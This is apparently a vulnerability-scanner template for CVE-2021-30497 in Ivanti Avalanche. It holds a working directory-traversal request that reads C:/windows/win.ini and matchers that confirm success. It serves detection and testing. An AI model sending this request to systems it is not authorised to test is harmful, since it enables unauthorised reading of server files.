id: CVE-2021-30497
info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
classification:
cve-id: CVE-2021-30497
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: status
status:
- 200